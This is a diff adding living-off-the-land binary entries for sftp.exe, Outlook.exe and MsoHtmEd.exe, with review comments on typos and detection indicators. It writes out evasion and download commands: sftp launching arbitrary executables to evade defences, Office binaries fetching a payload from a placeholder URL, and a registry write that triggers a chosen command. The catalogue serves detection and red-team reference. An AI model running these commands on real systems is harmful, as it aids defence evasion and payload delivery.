diff --git a/yml/OSBinaries/sftp.yml b/yml/OSBinaries/sftp.yml
new file mode 100644
index 00000000..7159022b
--- /dev/null
+++ b/yml/OSBinaries/sftp.yml
@@ -0,0 +1,35 @@
+---
+Name: sftp.exe
+Description: SSH File Transfer Protocol
+Author: Nir Chako
+Created: 2022-11-06
+Commands:
+ - Command: "sftp -D c:\\windows\\system32\\notepad.exe"
+ Description: Execute notepad.exe with sftp.exe as parent process
+ Usecase: Use sftp.exe as a proxy binary to evade defensive counter-measures
+ Category: Execute
+ Privileges: User
+ MitreID: T1202
+ OperatingSystem: Windows 10, Windows 11
+ - Command: "sftp -S c:\\windows\\system32\\notepad.exe localhost"
+ Description: Execute notepad.exe with sftp.exe as parent process
+ Usecase: Use sftp.exe as a proxy binary to evade defensive counter-measures
+ Category: Execute
+ Privileges: User
+ MitreID: T1202
+ OperatingSystem: Windows 10, Windows 11
+ - Command: "sftp @: "
+ Description: Download file with sftp.exe from an FTP server
+ Usecase: Use sftp.exe as a proxy binary to evade defensive counter-measures. If needed, you will be asked to submit a password for the sFTP session.
+ Category: Download
+ Privileges: User
+ MitreID: T1202
+ OperatingSystem: Windows 10, Windows 11
+Full_Path:
+ - Path: c:\windows\system32\OpenSSH\sftp.exe
+Detection:
+ - IOC: sftp.exe spawning unexpected processes
+ - IOC: Suspicious sFTP internet/network traffic
+Acknowledgement:
+ - Person: 'Nir Chako (Pentera)'
+ Handle: '@C_h4ck_0'
diff --git a/yml/OtherMSBinaries/MsoHtmEd.yml b/yml/OtherMSBinaries/MsoHtmEd.yml
index fb2ac30b..6f2fdd0c 100644
--- a/yml/OtherMSBinaries/MsoHtmEd.yml
+++ b/yml/OtherMSBinaries/MsoHtmEd.yml
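Review bot: The third command string, `"sftp @: "`, carries no user, host or remote-path placeholders as it appears here, so the entry cannot be read back from the YAML alone; spell them out in the string (for instance `"sftp <user>@<host>:<remote_path>"`, a constructed example to be checked against sftp's own usage text). Its Description says `from an FTP server`, but the binary only speaks SFTP, so `from an SFTP server` is the accurate wording. That Download entry is tagged `MitreID: T1202` like the two Execute entries above it, whereas the Outlook.yml entry added in the same commit tags the same Download usecase `T1105`; the two files should agree on the technique id. The first Detection IOC could be made actionable by naming the relationship the Execute entries rely on, e.g. `- IOC: sftp.exe spawning a child process supplied via -D or -S`.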
@@ -4,6 +4,13 @@ Description: Microsoft Office component
 Author: Nir Chako
 Created: 2022-07-24
 Commands:
+ - Command: MsoHtmEd.exe https://any-valid-link-to-download-any-html-file-from.com
+ Description: Execute a command line from the registry
+ Usecase: Set this registry key with the desired commaned you want to trigger (this example executes calc.exe) - reg add "HKCU\SOFTWARE\Microsoft\Shared\HTML\Default Editor\shell\edit\command" /f /t REG_SZ /d "calc.exe"
+ Category: Execute
+ Privileges: User
+ MitreID: T1218
+ OperatingSystem: Windows 10, Windows 11
 - Command: MsoHtmEd.exe https://example.com/payload
 Description: Downloads payload from remote server
 Usecase: It will download a remote payload and place it in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE)
diff --git a/yml/OtherMSBinaries/Outlook.yml b/yml/OtherMSBinaries/Outlook.yml
new file mode 100644
index 00000000..a7efcf35
--- /dev/null
+++ b/yml/OtherMSBinaries/Outlook.yml
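Review bot: The Usecase line of the added entry has a typo (`commaned` should be `command`), and its URL placeholder `https://any-valid-link-to-download-any-html-file-from.com` differs in style from the `https://example.com/payload` placeholder of the neighbouring entry; using the same example domain keeps the list consistent. Because this entry is driven entirely by the value stored under `HKCU\SOFTWARE\Microsoft\Shared\HTML\Default Editor\shell\edit\command`, the file's Detection section (outside this hunk) should gain a matching indicator, e.g. `- IOC: Modification of HKCU\SOFTWARE\Microsoft\Shared\HTML\Default Editor\shell\edit\command`, since a registry write is the observable that precedes the launch. The Commands list continues past the end of the hunk.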
@@ -0,0 +1,34 @@
+---
+Name: Outlook.exe
+Description: Microsoft Office component
+Author: Nir Chako
+Created: 2022-11-08
+Commands:
+ - Command: Outlook.exe https://example.com/payload
+ Description: Downloads payload from remote server
+ Usecase: It will download a remote payload and place it in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE)
+ Category: Download
+ Privileges: User
+ MitreID: T1105
+ OperatingSystem: Windows 10, Windows 11
+Full_Path:
+ - Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\Outlook.exe
+ - Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\Outlook.exe
+ - Path: C:\Program Files (x86)\Microsoft Office\Office16\Outlook.exe
+ - Path: C:\Program Files\Microsoft Office\Office16\Outlook.exe
+ - Path: C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\Outlook.exe
+ - Path: C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\Outlook.exe
+ - Path: C:\Program Files (x86)\Microsoft Office\Office15\Outlook.exe
+ - Path: C:\Program Files\Microsoft Office\Office15\Outlook.exe
+ - Path: C:\Program Files (x86)\Microsoft Office 14\ClientX86\Root\Office14\Outlook.exe
+ - Path: C:\Program Files\Microsoft Office 14\ClientX64\Root\Office14\Outlook.exe
+ - Path: C:\Program Files (x86)\Microsoft Office\Office14\Outlook.exe
+ - Path: C:\Program Files\Microsoft Office\Office14\Outlook.exe
+ - Path: C:\Program Files (x86)\Microsoft Office\Office12\Outlook.exe
+ - Path: C:\Program Files\Microsoft Office\Office12\Outlook.exe
+ - Path: C:\Program Files\Microsoft Office\Office12\Outlook.exe
+Detection:
+ - IOC: Suspicious Office application internet/network traffic
+Acknowledgement:
+ - Person: Nir Chako (Pentera)
+ Handle: '@C_h4ck_0'
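Review bot: The Full_Path list ends with `C:\Program Files\Microsoft Office\Office12\Outlook.exe` twice (its last two entries), so one of them should be dropped. The only Detection IOC, `Suspicious Office application internet/network traffic`, does not separate this from everyday Outlook activity; an indicator on the process command line, e.g. `- IOC: Outlook.exe launched with a URL as its argument`, matches what the Command field actually shows. The `Person` value is unquoted here but single-quoted in the sftp.yml entry of the same commit; the two new files should use one form. The Usecase text, including the `%LOCALAPPDATA%\Microsoft\Windows\INetCache\IE` cache path, appears to be copied verbatim from MsoHtmEd.yml, so it is worth confirming that Outlook.exe stores the fetched file in the same location before the entry is merged.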